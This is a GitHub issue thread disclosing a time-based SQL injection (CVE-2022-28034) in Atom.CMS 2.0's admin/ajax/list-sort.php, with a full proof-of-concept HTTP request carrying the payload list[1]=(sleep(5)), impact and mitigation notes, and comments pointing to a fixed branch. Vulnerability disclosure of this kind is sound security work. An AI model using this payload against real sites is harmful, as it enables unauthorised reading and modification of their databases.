### ISSUE TITLE
SQL Injection vulnerability  on Atom.CMS_admin_ajax_list-sort.php

### ISSUE THREAD

**Issue by Limerence98** [thedigicraft/Atom.CMS#261]
Exploit Title: SQL Injection vulnerability  on Atom.CMS_admin_ajax_list-sort.php
Date: 21-March-2022
Exploit Author: [@Limerence](https://github.com/xuehaobaobao)
Software Link: https://github.com/thedigicraft/Atom.CMS
Version: AtomCMS 2.0

Description:
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

Code Analysis:

```
GET /admin/ajax/list-sort.php?list[1]=(sleep(5)) HTTP/1.1
Host: test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://test.test/admin/index.php?page=settings
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


```
![image](https://user-images.githubusercontent.com/31301145/159227377-6b9edbf8-ef74-4ca5-8efc-3a19d575642c.png)

payload: list[1]=(sleep(5))

admin/ajax/list-sort.php

![image](https://user-images.githubusercontent.com/31301145/159227452-1a899a58-ab00-4db9-b51a-96af769409ed.png)

Impact: Read and modify the users database
Mitigation: Use of Parameterized SQL Queries and Validation

**Comment by xuehaobaobao** [comment]
This vulnerability credits ADLab of Venustech.
CVE-2022-28034

**Comment by creptor** [comment]
Same type of vulnerability addressed on #257 and #255

**Comment by v-dumitrescu** [comment]
The branch "AtomCMS-2.1" contains security fixes.
